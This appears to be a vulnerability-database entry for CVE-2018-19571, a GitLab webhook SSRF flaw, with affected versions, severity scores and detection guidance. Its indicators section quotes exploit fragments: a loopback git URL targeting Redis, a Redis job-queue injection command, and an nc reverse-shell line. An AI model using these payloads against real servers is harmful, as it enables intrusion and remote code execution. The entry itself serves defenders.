CVE-2018-19571
published 2019-07-10

CVE-2018-19571: GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

Priority: P2 (64)
Severity: high, CVSS 3.1 base score 7.7
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Exploit: public exploit available
EPSS: 27.98% (97.9th percentile)

Affected (6 ranges)

Vendor   Product     Version range              Fixed in
debian   gitlab      < 11.3.11+dfsg-1 (sid)     11.3.11+dfsg-1 (sid)
gitlab   gitlab      (not specified)            (not specified)
gitlab   gitlab      >= 11.4.0, < 11.4.8        11.4.8
gitlab   gitlab      >= 11.5.0, < 11.5.1        11.5.1
gitlab   gitlab      >= 8.18.0, < 11.3.11       11.3.11
gitlab   gitlab_ce   (not specified)            (not specified)

Detection & IOCs (extracted from sources)

url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
url (encoded): git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git
port: 6379
command: multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push
command: open('|nc <ip> <port> -e /bin/sh').read
other: resque:gitlab:queue:system_hook_push
path: /projects/new
path: /users/sign_in
  • Detect SSRF via git import_url using IPv6-mapped IPv4 loopback address targeting Redis on port 6379 — the core exploitation primitive for CVE-2018-19571.
  • Monitor for the anomalous User-Agent 'Moana Browser 1.0' in HTTP requests to GitLab, associated with exploit script 49257.
  • Flag POST to /projects with Content-Type application/x-www-form-urlencoded containing the string 'resque:gitlab:queue:system_hook_push' in the body.
  • Detect outbound connections from the GitLab server to 127.0.0.1:6379 (Redis) originating from the git import/clone functionality, indicating SSRF exploitation.
  • Exploitation requires an authenticated GitLab session; the SSRF in webhooks/import_url is chained with CVE-2018-19585 (CRLF injection) to achieve RCE. Blocking unauthenticated access alone is insufficient.
  • The exploit targets GitLab running on non-standard port 5080 in the tested environment; detection rules should not be limited to port 80/443.
  • Affected versions span a wide range (8.18 through 11.5.0); patched versions are 11.3.11, 11.4.8, and 11.5.1. Ensure version checks cover all branches.

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      7.7     HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
nvd             v2.0      4.0     MEDIUM     AV:N/AC:L/Au:S/C:P/I:N/A:N
vendor_debian   -         7.7     HIGH       -